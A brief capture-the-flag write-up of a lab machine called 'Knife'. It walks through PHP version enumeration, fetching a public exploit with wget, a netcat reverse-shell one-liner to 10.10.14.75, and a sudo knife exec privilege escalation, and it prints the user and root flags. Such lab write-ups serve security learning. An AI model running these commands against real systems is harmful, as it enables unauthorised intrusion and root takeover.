Professional Documents
Culture Documents
MACHINE-KNIFE
SUBMITTED BY
VIVEK A
2. ENUMERATION
We opened port 80 and the website got opened. But there is nothing we can do in this website.
Then we used a tool called wappalyzer to enumerate further. By using that tool we got the PHP
version of the website as 8.1.0.
I searched for the exploit of PHP 8.1.0 and found out the program file for exploitation.
Then using wget I downloaded the program file and renamed it to a PYTHON file.
wget https://www.exploit-db.com/raw/49933
3. EXPLOITATION
Then I run the python file and exploited the target machine.
python file.py
After exploiting this machine , still I couldn’t do any of the operations. So to continue further I
used another tool called NETCAT to exploit further.
Then using the previous terminal in which python is running I entered the following code.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.75 1234 >/tmp/f
This code is entered to move further using NETCAT.
As I looked into the home directory in the system, I got the user directory JAMES and found out the user flag.
3996b98220f1bb8b675640e9f5086408
4. PRIVILEGE ESCALATION
Using the below mentioned code, we are trying to get root access.
sudo /usr/bin/knife exec --exec "exec '/bin/bash -i'"
At last we got the root access and found out the root flag.
1ce3e62bc3d0600f691e21eb4a41a411